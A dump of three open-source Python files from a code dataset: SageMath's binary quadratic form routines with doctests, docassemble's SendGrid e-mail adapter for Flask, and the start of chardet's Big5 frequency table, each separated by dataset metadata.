[-x^2 + 8*x*y + 3*y^2,
3*x^2 + 4*x*y - 5*y^2,
-5*x^2 + 6*x*y + 2*y^2,
2*x^2 + 6*x*y - 5*y^2,
-5*x^2 + 4*x*y + 3*y^2,
3*x^2 + 8*x*y - y^2]
"""
if not (self.is_indef() and self.is_reduced()):
raise ValueError("%s must be indefinite and reduced" % self)
if self.discriminant().is_square():
# Buchmann/Vollmer assume the discriminant to be non-square
raise NotImplementedError('computation of cycles is only '
'implemented for non-square discriminants')
if proper:
# Prop 6.10.5 in Buchmann Vollmer
C = list(self.cycle(proper=False)) # make a copy so we can modify it
if len(C) % 2:
C += C
for i in range(len(C)//2):
C[2*i+1] = C[2*i+1]._Tau()
return C
if not hasattr(self, '_cycle_list'):
C = [self]
Q1 = self._RhoTau()
while not self == Q1:
C.append(Q1)
Q1 = Q1._RhoTau()
self._cycle_list = C
return self._cycle_list
def is_positive_definite(self):
"""
Return ``True`` if ``self`` is positive definite, i.e., has
negative discriminant with `a > 0`.
EXAMPLES::
sage: Q = BinaryQF(195751, 37615, 1807)
sage: Q.is_positive_definite()
True
sage: Q = BinaryQF(195751, 1212121, -1876411)
sage: Q.is_positive_definite()
False
"""
return self.discriminant() < 0 and self._a > 0
is_posdef = is_positive_definite
def is_negative_definite(self):
"""
Return ``True`` if ``self`` is negative definite, i.e., has
negative discriminant with `a < 0`.
EXAMPLES::
sage: Q = BinaryQF(-1, 3, -5)
sage: Q.is_positive_definite()
False
sage: Q.is_negative_definite()
True
"""
return self.discriminant() < 0 and self._a < 0
is_negdef = is_negative_definite
def is_indefinite(self):
"""
Return if ``self`` is indefinite, i.e., has positive discriminant.
EXAMPLES::
sage: Q = BinaryQF(1, 3, -5)
sage: Q.is_indef()
True
"""
return self.discriminant() > 0
is_indef = is_indefinite
def is_singular(self):
"""
Return if ``self`` is singular, i.e., has zero discriminant.
EXAMPLES::
sage: Q = BinaryQF(1, 3, -5)
sage: Q.is_singular()
False
sage: Q = BinaryQF(1, 2, 1)
sage: Q.is_singular()
True
"""
return self.discriminant().is_zero()
def is_nonsingular(self):
"""
Return if this form is nonsingular, i.e., has non-zero discriminant.
EXAMPLES::
sage: Q = BinaryQF(1, 3, -5)
sage: Q.is_nonsingular()
True
sage: Q = BinaryQF(1, 2, 1)
sage: Q.is_nonsingular()
False
"""
return not self.discriminant().is_zero()
def is_equivalent(self, other, proper=True):
"""
Return if ``self`` is equivalent to ``other``.
INPUT:
- ``proper`` -- bool (default: ``True``); if ``True`` use proper
equivalence
- ``other`` -- a binary quadratic form
EXAMPLES::
sage: Q3 = BinaryQF(4, 4, 15)
sage: Q2 = BinaryQF(4, -4, 15)
sage: Q2.is_equivalent(Q3)
True
sage: a = BinaryQF([33, 11, 5])
sage: b = a.reduced_form(); b
5*x^2 - x*y + 27*y^2
sage: a.is_equivalent(b)
True
sage: a.is_equivalent(BinaryQF((3, 4, 5)))
False
Some indefinite examples::
sage: Q1 = BinaryQF(9, 8, -7)
sage: Q2 = BinaryQF(9, -8, -7)
sage: Q1.is_equivalent(Q2, proper=True)
False
sage: Q1.is_equivalent(Q2, proper=False)
True
TESTS:
We check that :trac:`25888` is fixed::
sage: Q1 = BinaryQF(3, 4, -2)
sage: Q2 = BinaryQF(-2, 4, 3)
sage: Q1.is_equivalent(Q2) == Q2.is_equivalent(Q1)
True
sage: Q1.is_equivalent(Q2, proper=False) == Q2.is_equivalent(Q1, proper=False)
True
sage: Q1.is_equivalent(Q2, proper=True)
True
We check that the first part of :trac:`29028` is fixed::
sage: Q = BinaryQF(0, 2, 0)
sage: Q.discriminant()
4
sage: Q.is_equivalent(Q, proper=True)
True
sage: Q.is_equivalent(Q, proper=False)
True
A test for rational forms::
sage: Q1 = BinaryQF(0, 4, 2)
sage: Q2 = BinaryQF(2, 4, 0)
sage: Q1.is_equivalent(Q2, proper=False)
True
Test another part of :trac:`28989`::
sage: Q1, Q2 = BinaryQF(1, 1, -1), BinaryQF(-1, 1, 1)
sage: Q1.is_equivalent(Q2, proper=True)
True
"""
if type(other) != type(self):
raise TypeError("%s is not a BinaryQF" % other)
if self.discriminant() != other.discriminant():
return False
if self.is_indef():
# First, reduce self and other
selfred = self.reduced_form()
otherred = other.reduced_form()
if self.discriminant().is_square():
# make sure we terminate in a form
# with c = 0
while selfred[2] != 0:
selfred = selfred._Rho()
while otherred[2] != 0:
otherred = otherred._Rho()
b = selfred._b
a = selfred._a
ao = otherred._a
assert otherred._b == b
# p. 359 of Conway-Sloane [CS1999]_
# but `2b` in their notation is `b` in our notation
is_properly_equiv = ((a-ao) % b == 0)
if proper:
return is_properly_equiv
else:
g = gcd(a, b)
return is_properly_equiv or ((gcd(ao,b) == g) and ((a*ao - g**2) % (b*g) == 0))
proper_cycle = otherred.cycle(proper=True)
is_prop = selfred in proper_cycle
if proper or is_prop:
return is_prop
# note that our definition of improper equivalence
# differs from that of Buchmann and Vollmer
# their action is det f * q(f(x, y))
# ours is q(f(x, y))
# an improper equivalence in our convention
selfred = BinaryQF(selfred._c, selfred._b, selfred._a)
assert selfred.is_reduced()
return selfred in proper_cycle
# Else we're dealing with definite forms.
if self.is_posdef() and not other.is_posdef():
return False
if self.is_negdef() and not other.is_negdef():
return False
Q1 = self.reduced_form()
Q2 = other.reduced_form()
if Q1 == Q2:
return True
if not proper:
Q1e = BinaryQF(self._c, self._b, self._a).reduced_form()
return Q1e == Q2
return False
@cached_method
def is_reduced(self):
r"""
Return if ``self`` is reduced.
Let `f = a x^2 + b xy + c y^2` be a binary quadratic form of
discriminant `D`.
- If `f` is positive definite (`D < 0` and `a > 0`), then `f`
is reduced if and only if `|b|\leq a \leq c`, and `b\geq 0`
if either `a = b` or `a = c`.
- If `f` is negative definite (`D < 0` and `a < 0`), then `f`
is reduced if and only if the positive definite form with
coefficients `(-a, b, -c)` is reduced.
- If `f` is indefinite (`D > 0`), then `f` is reduced if and
only if `|\sqrt{D} - 2|a|| < b < \sqrt{D}`
or `a = 0` and `-b < 2c \leq b`
or `c = 0` and `-b < 2a \leq b`
EXAMPLES::
sage: Q = BinaryQF([1, 2, 3])
sage: Q.is_reduced()
False
sage: Q = BinaryQF([2, 1, 3])
sage: Q.is_reduced()
True
sage: Q = BinaryQF([1, -1, 1])
sage: Q.is_reduced()
False
sage: Q = BinaryQF([1, 1, 1])
sage: Q.is_reduced()
True
Examples using indefinite forms::
sage: f = BinaryQF(-1, 2, 2)
sage: f.is_reduced()
True
sage: BinaryQF(1, 9, 4).is_reduced()
False
sage: BinaryQF(1, 5, -1).is_reduced()
True
"""
D = self.discriminant()
a = self._a
b = self._b
c = self._c
if D < 0 and a > 0:
return ((-a < b <= a < c)
or (ZZ(0) <= b <= a == c))
elif D < 0 and self._a < 0:
return ((a < b <= -a < -c)
or (ZZ(0) <= b <= -a == -c))
else:
d = D.sqrt(prec=53)
return (((d - 2*a.abs()).abs() < b < d)
or (0 == a and -b < 2*c <= b)
or (0 == c and -b < 2*a <= b))
def complex_point(self):
r"""
Return the point in the complex upper half-plane associated to ``self``.
This form, `ax^2 + b xy + cy^2`, must be definite with
negative discriminant `b^2 - 4 a c < 0`.
OUTPUT:
- the unique complex root of `a x^2 + b x + c` with positive
imaginary part
EXAMPLES::
sage: Q = BinaryQF([1, 0, 1])
sage: Q.complex_point()
1.00000000000000*I
"""
if self.discriminant() >= 0:
raise ValueError("only defined for negative discriminant")
Q1 = ZZ['x']([self._c, self._b, self._a])
return [z for z in Q1.complex_roots() if z.imag() > 0][0]
def matrix_action_left(self, M):
r"""
Return the binary quadratic form resulting from the left action
of the 2-by-2 matrix `M` on ``self``.
Here the action of the matrix `M = \begin{pmatrix} a & b \\ c & d
\end{pmatrix}` on the form `Q(x, y)` produces the form `Q(ax+cy,
bx+dy)`.
EXAMPLES::
sage: Q = BinaryQF([2, 1, 3]); Q
2*x^2 + x*y + 3*y^2
sage: M = matrix(ZZ, [[1, 2], [3, 5]])
sage: Q.matrix_action_left(M)
16*x^2 + 83*x*y + 108*y^2
"""
v, w = M.rows()
a1 = self(v)
c1 = self(w)
b1 = self(v + w) - a1 - c1
return BinaryQF([a1, b1, c1])
def matrix_action_right(self, M):
r"""
Return the binary quadratic form resulting from the right action
of the 2-by-2 matrix `M` on ``self``.
Here the action of the matrix `M = \begin{pmatrix} a & b \\ c & d
\end{pmatrix}` on the form `Q(x, y)` produces the form `Q(ax+by,
cx+dy)`.
EXAMPLES::
sage: Q = BinaryQF([2, 1, 3]); Q
2*x^2 + x*y + 3*y^2
sage: M = matrix(ZZ, [[1, 2], [3, 5]])
sage: Q.matrix_action_right(M)
32*x^2 + 109*x*y + 93*y^2
"""
v, w = M.columns()
a1 = self(v)
c1 = self(w)
b1 = self(v + w) - a1 - c1
return BinaryQF([a1, b1, c1])
def small_prime_value(self, Bmax=1000):
r"""
Returns a prime represented by this (primitive positive definite) binary form.
INPUT:
- ``Bmax`` -- a positive bound on the representing integers.
OUTPUT:
A prime number represented by the form.
.. NOTE::
This is a very elementary implementation which just substitutes
values until a prime is found.
EXAMPLES::
sage: [Q.small_prime_value() for Q in BinaryQF_reduced_representatives(-23, primitive_only=True)]
[23, 2, 2]
sage: [Q.small_prime_value() for Q in BinaryQF_reduced_representatives(-47, primitive_only=True)]
[47, 2, 2, 3, 3]
"""
from sage.sets.all import Set
from sage.arith.srange import xsrange
B = 10
while True:
llist = list(Set([self(x, y) for x in xsrange(-B, B) for y in xsrange(B)]))
llist = sorted([l for l in llist if l.is_prime()])
if llist:
return llist[0]
if B >= Bmax:
raise ValueError("Unable to find a prime value of %s" % self)
B += 10
def solve_integer(self, n):
r"""
Solve `Q(x, y) = n` in integers `x` and `y` where `Q` is this
quadratic form.
INPUT:
- ``n`` -- a positive integer
OUTPUT:
A tuple `(x, y)` of integers satisfying `Q(x, y) = n` or ``None``
if no such `x` and `y` exist.
EXAMPLES::
sage: Qs = BinaryQF_reduced_representatives(-23, primitive_only=True)
sage: Qs
[x^2 + x*y + 6*y^2, 2*x^2 - x*y + 3*y^2, 2*x^2 + x*y + 3*y^2]
sage: [Q.solve_integer(3) for Q in Qs]
[None, (0, 1), (0, 1)]
sage: [Q.solve_integer(5) for Q in Qs]
[None, None, None]
sage: [Q.solve_integer(6) for Q in Qs]
[(0, 1), (-1, 1), (1, 1)]
"""
a, b, c = self
d = self.discriminant()
if d >= 0 or a <= 0:
raise NotImplementedError("%s is not positive definite" % self)
ad = -d
an4 = 4*a*n
a2 = 2*a
from sage.arith.srange import xsrange
for y in xsrange(0, 1+an4//ad):
z2 = an4 + d*y**2
for z in z2.sqrt(extend=False, all=True):
if a2.divides(z-b*y):
x = (z-b*y)//a2
return (x, y)
return None
def BinaryQF_reduced_representatives(D, primitive_only=False, proper=True):
r"""
Return representatives for the classes of binary quadratic forms
of discriminant `D`.
INPUT:
- ``D`` -- (integer) a discriminant
- ``primitive_only`` -- (boolean; default: ``True``): if ``True``, only
return primitive forms.
- ``proper`` -- (boolean; default: ``True``)
OUTPUT:
(list) A lexicographically-ordered list of inequivalent reduced
representatives for the (im)proper equivalence classes of binary quadratic
forms of discriminant `D`. If ``primitive_only`` is ``True`` then
imprimitive forms (which only exist when `D` is not fundamental) are
omitted; otherwise they are included.
EXAMPLES::
sage: BinaryQF_reduced_representatives(-4)
[x^2 + y^2]
sage: BinaryQF_reduced_representatives(-163)
[x^2 + x*y + 41*y^2]
sage: BinaryQF_reduced_representatives(-12)
[x^2 + 3*y^2, 2*x^2 + 2*x*y + 2*y^2]
sage: BinaryQF_reduced_representatives(-16)
[x^2 + 4*y^2, 2*x^2 + 2*y^2]
sage: BinaryQF_reduced_representatives(-63)
[x^2 + x*y + 16*y^2, 2*x^2 - x*y + 8*y^2, 2*x^2 + x*y + 8*y^2, 3*x^2 + 3*x*y + 6*y^2, 4*x^2 + x*y + 4*y^2]
The number of inequivalent reduced binary forms with a fixed negative
fundamental discriminant D is the class number of the quadratic field
`\QQ(\sqrt{D})`::
sage: len(BinaryQF_reduced_representatives(-13*4))
2
sage: QuadraticField(-13*4, 'a').class_number()
2
sage: p = next_prime(2^20); p
1048583
sage: len(BinaryQF_reduced_representatives(-p))
689
sage: QuadraticField(-p, 'a').class_number()
689
sage: BinaryQF_reduced_representatives(-23*9)
[x^2 + x*y + 52*y^2,
2*x^2 - x*y + 26*y^2,
2*x^2 + x*y + 26*y^2,
3*x^2 + 3*x*y + 18*y^2,
4*x^2 - x*y + 13*y^2,
4*x^2 + x*y + 13*y^2,
6*x^2 - 3*x*y + 9*y^2,
6*x^2 + 3*x*y + 9*y^2,
8*x^2 + 7*x*y + 8*y^2]
sage: BinaryQF_reduced_representatives(-23*9, primitive_only=True)
[x^2 + x*y + 52*y^2,
2*x^2 - x*y + 26*y^2,
2*x^2 + x*y + 26*y^2,
4*x^2 - x*y + 13*y^2,
4*x^2 + x*y + 13*y^2,
8*x^2 + 7*x*y + 8*y^2]
TESTS::
sage: BinaryQF_reduced_representatives(73)
[4*x^2 + 3*x*y - 4*y^2]
sage: BinaryQF_reduced_representatives(76, primitive_only=True)
[-3*x^2 + 4*x*y + 5*y^2,
3*x^2 + 4*x*y - 5*y^2]
sage: BinaryQF_reduced_representatives(136)
[-5*x^2 + 4*x*y + 6*y^2,
-2*x^2 + 8*x*y + 9*y^2,
2*x^2 + 8*x*y - 9*y^2,
5*x^2 + 4*x*y - 6*y^2]
sage: BinaryQF_reduced_representatives(136, proper=False)
[-2*x^2 + 8*x*y + 9*y^2, 2*x^2 + 8*x*y - 9*y^2, 5*x^2 + 4*x*y - 6*y^2]
Check that the primitive_only keyword does something::
sage: BinaryQF_reduced_representatives(148, proper=False, primitive_only=False)
[x^2 + 12*x*y - y^2, 4*x^2 + 6*x*y - 7*y^2, 6*x^2 + 2*x*y - 6*y^2]
sage: BinaryQF_reduced_representatives(148, proper=False, primitive_only=True)
[x^2 + 12*x*y - y^2, 4*x^2 + 6*x*y - 7*y^2]
sage: BinaryQF_reduced_representatives(148, proper=True, primitive_only=True)
[-7*x^2 + 6*x*y + 4*y^2, x^2 + 12*x*y - y^2, 4*x^2 + 6*x*y - 7*y^2]
sage: BinaryQF_reduced_representatives(148, proper=True, primitive_only=False)
[-7*x^2 + 6*x*y + 4*y^2,
x^2 + 12*x*y - y^2,
4*x^2 + 6*x*y - 7*y^2,
6*x^2 + 2*x*y - 6*y^2]
Test another part of :trac:`29028`::
sage: BinaryQF_reduced_representatives(10^2, proper=False, primitive_only=False)
[-4*x^2 + 10*x*y,
-3*x^2 + 10*x*y,
-2*x^2 + 10*x*y,
-x^2 + 10*x*y,
10*x*y,
x^2 + 10*x*y,
2*x^2 + 10*x*y,
5*x^2 + 10*x*y]
sage: BinaryQF_reduced_representatives(10^2, proper=False, primitive_only=True)
[-3*x^2 + 10*x*y, -x^2 + 10*x*y, x^2 + 10*x*y]
sage: BinaryQF_reduced_representatives(10^2, proper=True, primitive_only=True)
[-3*x^2 + 10*x*y, -x^2 + 10*x*y, x^2 + 10*x*y, 3*x^2 + 10*x*y]
sage: BinaryQF_reduced_representatives(10^2, proper=True, primitive_only=False)
[-4*x^2 + 10*x*y,
-3*x^2 + 10*x*y,
-2*x^2 + 10*x*y,
-x^2 + 10*x*y,
10*x*y,
x^2 + 10*x*y,
2*x^2 + 10*x*y,
3*x^2 + 10*x*y,
4*x^2 + 10*x*y,
5*x^2 + 10*x*y]
"""
D = ZZ(D)
# For a fundamental discriminant all forms are primitive so we need not check:
if primitive_only:
primitive_only = not is_fundamental_discriminant(D)
form_list = []
from sage.arith.srange import xsrange
D4 = D % 4
if D4 == 2 or D4 == 3:
raise ValueError("%s is not a discriminant" % D)
if D > 0: # Indefinite
if D.is_square():
b = D.sqrt()
c = ZZ(0)
# -b/2 < a <= b/2
for a in xsrange((-b/2).floor() + 1, (b/2).floor() + 1):
if (not primitive_only) or (gcd([a,b,c]) == 1):
form_list.append(BinaryQF(a, b, c))
# We follow the description of Buchmann/Vollmer 6.7.1. They
# enumerate all reduced forms. We only want representatives.
else:
sqrt_d = D.sqrt(prec=53)
for b in xsrange(1, sqrt_d.floor() + 1):
if (D - b) % 2:
continue
A = (D - b**2) / 4
Low_a = ((sqrt_d - b) / 2).ceil()
High_a = (A.sqrt(prec=53)).floor()
for a in xsrange(Low_a, High_a + 1):
if a == 0:
continue
c = -A/a
if c in ZZ:
if (not primitive_only) or gcd([a, b, c]) == 1:
Q = BinaryQF(a, b, c)
Q1 = BinaryQF(-a, b, -c)
form_list.append(Q)
form_list.append(Q1)
if a.abs() != c.abs():
Q = BinaryQF(c, b, a)
Q1 = BinaryQF(-c, b, -a)
form_list.append(Q)
form_list.append(Q1)
else: # Definite
# Only iterate over positive a and over b of the same
# parity as D such that 4a^2 + D <= b^2 <= a^2
for a in xsrange(1, 1+((-D)//3).isqrt()):
a4 = 4*a
s = D + a*a4
w = 1+(s-1).isqrt() if s > 0 else 0
if w%2 != D%2:
w += 1
for b in xsrange(w, a+1, 2):
t = b*b-D
if t % a4 == 0:
c = t // a4
if (not primitive_only) or gcd([a, b, c]) == 1:
if b>0 and a>b and c>a:
form_list.append(BinaryQF([a, -b, c]))
form_list.append(BinaryQF([a, b, c]))
if not proper or D > 0:
# TODO:
# instead of filtering, enumerate only improper classes to start with
# filter for equivalence classes
form_list_new = []
for q in form_list:
if not any(q.is_equivalent(q1, proper=proper) for q1 in form_list_new):
form_list_new.append(q)
form_list = form_list_new
form_list.sort()
return form_list
| 31.37537
| 142
| 0.467024
|
4a143e58a184bb21ae2ccd9e94c8505f112f4d6c
| 4,898
|
py
|
Python
|
docassemble_webapp/docassemble/webapp/sendgrid_mail.py
|
sadpe/docassemble
|
023fe1202d9ee8cc8a503811f8ecc4363a320c9e
|
[
"MIT"
] | null | null | null |
docassemble_webapp/docassemble/webapp/sendgrid_mail.py
|
sadpe/docassemble
|
023fe1202d9ee8cc8a503811f8ecc4363a320c9e
|
[
"MIT"
] | null | null | null |
docassemble_webapp/docassemble/webapp/sendgrid_mail.py
|
sadpe/docassemble
|
023fe1202d9ee8cc8a503811f8ecc4363a320c9e
|
[
"MIT"
] | null | null | null |
# Adapted from flask_mail
import time
import requests
from requests.auth import HTTPBasicAuth
from flask_mail import Message, BadHeaderError, sanitize_addresses, email_dispatched, contextmanager, current_app
from sendgrid import SendGridAPIClient
from sendgrid.helpers.mail import Mail as SGMail, Attachment, FileContent, FileName, FileType, Disposition, ContentId, Email, To
import sys
import base64
class Connection(object):
def __init__(self, mail):
self.mail = mail
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, tb):
pass
def send(self, message, envelope_from=None):
assert message.send_to, "No recipients have been added"
assert message.sender, (
"The message does not specify a sender and a default sender "
"has not been configured")
if message.has_bad_headers():
raise BadHeaderError
if message.date is None:
message.date = time.time()
if not message.subject:
message.subject = word("(no subject)")
sgmessage = SGMail(
from_email=Email(message.sender),
to_emails=[To(addressee) for addressee in sanitize_addresses(message.recipients)],
subject=message.subject,
plain_text_content=message.body,
html_content=message.html)
if message.cc:
for recipient in list(sanitize_addresses(message.cc)):
sgmessage.add_cc(recipient)
if message.bcc:
for recipient in list(sanitize_addresses(message.bcc)):
sgmessage.add_bcc(recipient)
if message.attachments:
for flask_attachment in message.attachments:
attachment = Attachment()
attachment.file_content = FileContent(base64.b64encode(flask_attachment.data).decode())
attachment.file_type = FileType(flask_attachment.content_type)
attachment.file_name = FileName(flask_attachment.filename)
attachment.disposition = Disposition(flask_attachment.disposition)
sgmessage.add_attachment(attachment)
sg = SendGridAPIClient(self.mail.api_key)
response = sg.send(sgmessage)
if response.status_code >= 400:
sys.stderr.write("SendGrid status code: " + str(response.status_code) + "\n")
sys.stderr.write("SendGrid response headers: " + repr(response.headers) + "\n")
try:
sys.stderr.write(repr(response.body) + "\n")
except:
pass
raise Exception("Failed to send e-mail message to SendGrid")
email_dispatched.send(message, app=current_app._get_current_object())
def send_message(self, *args, **kwargs):
self.send(Message(*args, **kwargs))
class _MailMixin(object):
@contextmanager
def record_messages(self):
if not email_dispatched:
raise RuntimeError("blinker must be installed")
outbox = []
def _record(message, app):
outbox.append(message)
email_dispatched.connect(_record)
try:
yield outbox
finally:
email_dispatched.disconnect(_record)
def send(self, message):
with self.connect() as connection:
message.send(connection)
def send_message(self, *args, **kwargs):
self.send(Message(*args, **kwargs))
def connect(self):
app = getattr(self, "app", None) or current_app
try:
return Connection(app.extensions['mail'])
except KeyError:
raise RuntimeError("The curent application was not configured with Flask-Mail")
class _Mail(_MailMixin):
def __init__(self, api_key,
default_sender, debug, suppress,
ascii_attachments=False):
self.api_key = api_key
self.default_sender = default_sender
self.debug = debug
self.suppress = suppress
self.ascii_attachments = ascii_attachments
class Mail(_MailMixin):
def __init__(self, app=None):
self.app = app
if app is not None:
self.state = self.init_app(app)
else:
self.state = None
def init_mail(self, config, debug=False, testing=False):
return _Mail(
config.get('SENDGRID_API_KEY'),
config.get('MAIL_DEFAULT_SENDER'),
int(config.get('MAIL_DEBUG', debug)),
config.get('MAIL_SUPPRESS_SEND', testing),
config.get('MAIL_ASCII_ATTACHMENTS', False)
)
def init_app(self, app):
state = self.init_mail(app.config, app.debug, app.testing)
app.extensions = getattr(app, 'extensions', {})
app.extensions['mail'] = state
return state
def __getattr__(self, name):
return getattr(self.state, name, None)
| 37.389313
| 128
| 0.629645
|
4a143e9e1039fe36e14f7f84d19cc6e0ea69f733
| 30,537
|
py
|
Python
|
darling_ansible/python_venv/lib/python3.7/site-packages/oci/_vendor/chardet/big5freq.py
|
revnav/sandbox
|
f9c8422233d093b76821686b6c249417502cf61d
|
[
"Apache-2.0"
] | null | null | null |
darling_ansible/python_venv/lib/python3.7/site-packages/oci/_vendor/chardet/big5freq.py
|
revnav/sandbox
|
f9c8422233d093b76821686b6c249417502cf61d
|
[
"Apache-2.0"
] | null | null | null |
darling_ansible/python_venv/lib/python3.7/site-packages/oci/_vendor/chardet/big5freq.py
|
revnav/sandbox
|
f9c8422233d093b76821686b6c249417502cf61d
|
[
"Apache-2.0"
] | 1
|
2020-06-25T03:12:58.000Z
|
2020-06-25T03:12:58.000Z
|
# coding: utf-8
# Modified Work: Copyright (c) 2018, 2020, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
# Original Work: Copyright (c) 2018 Character Encoding Detector contributors. https://github.com/chardet
# Big5 frequency table
# by Taiwan's Mandarin Promotion Council
# <http://www.edu.tw:81/mandr/>
#
# 128 --> 0.42261
# 256 --> 0.57851
# 512 --> 0.74851
# 1024 --> 0.89384
# 2048 --> 0.97583
#
# Ideal Distribution Ratio = 0.74851/(1-0.74851) =2.98
# Random Distribution Ration = 512/(5401-512)=0.105
#
# Typical Distribution Ratio about 25% of Ideal one, still much higher than RDR
BIG5_TYPICAL_DISTRIBUTION_RATIO = 0.75
#Char to FreqOrder table
BIG5_TABLE_SIZE = 5376
BIG5_CHAR_TO_FREQ_ORDER = (
1,1801,1506, 255,1431, 198, 9, 82, 6,5008, 177, 202,3681,1256,2821, 110, # 16
3814, 33,3274, 261, 76, 44,2114, 16,2946,2187,1176, 659,3971, 26,3451,2653, # 32
1198,3972,3350,4202, 410,2215, 302, 590, 361,1964, 8, 204, 58,4510,5009,1932, # 48
63,5010,5011, 317,1614, 75, 222, 159,4203,2417,1480,5012,3555,3091, 224,2822, # 64
3682, 3, 10,3973,1471, 29,2787,1135,2866,1940, 873, 130,3275,1123, 312,5013, # 80
4511,2052, 507, 252, 682,5014, 142,1915, 124, 206,2947, 34,3556,3204, 64, 604, # 96
5015,2501,1977,1978, 155,1991, 645, 641,1606,5016,3452, 337, 72, 406,5017, 80, # 112
630, 238,3205,1509, 263, 939,1092,2654, 756,1440,1094,3453, 449, 69,2987, 591, # 128
179,2096, 471, 115,2035,1844, 60, 50,2988, 134, 806,1869, 734,2036,3454, 180, # 144
995,1607, 156, 537,2907, 688,5018, 319,1305, 779,2145, 514,2379, 298,4512, 359, # 160
2502, 90,2716,1338, 663, 11, 906,1099,2553, 20,2441, 182, 532,1716,5019, 732, # 176
1376,4204,1311,1420,3206, 25,2317,1056, 113, 399, 382,1950, 242,3455,2474, 529, # 192
3276, 475,1447,3683,5020, 117, 21, 656, 810,1297,2300,2334,3557,5021, 126,4205, # 208
706, 456, 150, 613,4513, 71,1118,2037,4206, 145,3092, 85, 835, 486,2115,1246, # 224
1426, 428, 727,1285,1015, 800, 106, 623, 303,1281,5022,2128,2359, 347,3815, 221, # 240
3558,3135,5023,1956,1153,4207, 83, 296,1199,3093, 192, 624, 93,5024, 822,1898, # 256
2823,3136, 795,2065, 991,1554,1542,1592, 27, 43,2867, 859, 139,1456, 860,4514, # 272
437, 712,3974, 164,2397,3137, 695, 211,3037,2097, 195,3975,1608,3559,3560,3684, # 288
3976, 234, 811,2989,2098,3977,2233,1441,3561,1615,2380, 668,2077,1638, 305, 228, # 304
1664,4515, 467, 415,5025, 262,2099,1593, 239, 108, 300, 200,1033, 512,1247,2078, # 320
5026,5027,2176,3207,3685,2682, 593, 845,1062,3277, 88,1723,2038,3978,1951, 212, # 336
266, 152, 149, 468,1899,4208,4516, 77, 187,5028,3038, 37, 5,2990,5029,3979, # 352
5030,5031, 39,2524,4517,2908,3208,2079, 55, 148, 74,4518, 545, 483,1474,1029, # 368
1665, 217,1870,1531,3138,1104,2655,4209, 24, 172,3562, 900,3980,3563,3564,4519, # 384
32,1408,2824,1312, 329, 487,2360,2251,2717, 784,2683, 4,3039,3351,1427,1789, # 400
188, 109, 499,5032,3686,1717,1790, 888,1217,3040,4520,5033,3565,5034,3352,1520, # 416
3687,3981, 196,1034, 775,5035,5036, 929,1816, 249, 439, 38,5037,1063,5038, 794, # 432
3982,1435,2301, 46, 178,3278,2066,5039,2381,5040, 214,1709,4521, 804, 35, 707, # 448
324,3688,1601,2554, 140, 459,4210,5041,5042,1365, 839, 272, 978,2262,2580,3456, # 464
2129,1363,3689,1423, 697, 100,3094, 48, 70,1231, 495,3139,2196,5043,1294,5044, # 480
2080, 462, 586,1042,3279, 853, 256, 988, 185,2382,3457,1698, 434,1084,5045,3458, # 496
314,2625,2788,4522,2335,2336, 569,2285, 637,1817,2525, 757,1162,1879,1616,3459, # 512
287,1577,2116, 768,4523,1671,2868,3566,2526,1321,3816, 909,2418,5046,4211, 933, # 528
3817,4212,2053,2361,1222,4524, 765,2419,1322, 786,4525,5047,1920,1462,1677,2909, # 544
1699,5048,4526,1424,2442,3140,3690,2600,3353,1775,1941,3460,3983,4213, 309,1369, # 560
1130,2825, 364,2234,1653,1299,3984,3567,3985,3986,2656, 525,1085,3041, 902,2001, # 576
1475, 964,4527, 421,1845,1415,1057,2286, 940,1364,3141, 376,4528,4529,1381, 7, # 592
2527, 983,2383, 336,1710,2684,1846, 321,3461, 559,1131,3042,2752,1809,1132,1313, # 608
265,1481,1858,5049, 352,1203,2826,3280, 167,1089, 420,2827, 776, 792,1724,3568, # 624
4214,2443,3281,5050,4215,5051, 446, 229, 333,2753, 901,3818,1200,1557,4530,2657, # 640
1921, 395,2754,2685,3819,4216,1836, 125, 916,3209,2626,4531,5052,5053,3820,5054, # 656
5055,5056,4532,3142,3691,1133,2555,1757,3462,1510,2318,1409,3569,5057,2146, 438, # 672
2601,2910,2384,3354,1068, 958,3043, 461, 311,2869,2686,4217,1916,3210,4218,1979, # 688
383, 750,2755,2627,4219, 274, 539, 385,1278,1442,5058,1154,1965, 384, 561, 210, # 704
98,1295,2556,3570,5059,1711,2420,1482,3463,3987,2911,1257, 129,5060,3821, 642, # 720
523,2789,2790,2658,5061, 141,2235,1333, 68, 176, 441, 876, 907,4220, 603,2602, # 736
710, 171,3464, 404, 549, 18,3143,2398,1410,3692,1666,5062,3571,4533,2912,4534, # 752
5063,2991, 368,5064, 146, 366, 99, 871,3693,1543, 748, 807,1586,1185, 22,2263, # 768
379,3822,3211,5065,3212, 505,1942,2628,1992,1382,2319,5066, 380,2362, 218, 702, # 784
1818,1248,3465,3044,3572,3355,3282,5067,2992,3694, 930,3283,3823,5068, 59,5069, # 800
585, 601,4221, 497,3466,1112,1314,4535,1802,5070,1223,1472,2177,5071, 749,1837, # 816
690,1900,3824,1773,3988,1476, 429,1043,1791,2236,2117, 917,4222, 447,1086,1629, # 832
5072, 556,5073,5074,2021,1654, 844,1090, 105, 550, 966,1758,2828,1008,1783, 686, # 848
1095,5075,2287, 793,1602,5076,3573,2603,4536,4223,2948,2302,4537,3825, 980,2503, # 864
544, 353, 527,4538, 908,2687,2913,5077, 381,2629,1943,1348,5078,1341,1252, 560, # 880
3095,5079,3467,2870,5080,2054, 973, 886,2081, 143,4539,5081,5082, 157,3989, 496, # 896
4224, 57, 840, 540,2039,4540,4541,3468,2118,1445, 970,2264,1748,1966,2082,4225, # 912
3144,1234,1776,3284,2829,3695, 773,1206,2130,1066,2040,1326,3990,1738,1725,4226, # 928
279,3145, 51,1544,2604, 423,1578,2131,2067, 173,4542,1880,5083,5084,1583, 264, # 944
610,3696,4543,2444, 280, 154,5085,5086,5087,1739, 338,1282,3096, 693,2871,1411, # 960
1074,3826,2445,5088,4544,5089,5090,1240, 952,2399,5091,2914,1538,2688, 685,1483, # 976
4227,2475,1436, 953,4228,2055,4545, 671,2400, 79,4229,2446,3285, 608, 567,2689, # 992
3469,4230,4231,1691, 393,1261,1792,2401,5092,4546,5093,5094,5095,5096,1383,1672, # 1008
3827,3213,1464, 522,1119, 661,1150, 216, 675,4547,3991,1432,3574, 609,4548,2690, # 1024
2402,5097,5098,5099,4232,3045, 0,5100,2476, 315, 231,2447, 301,3356,4549,2385, # 1040
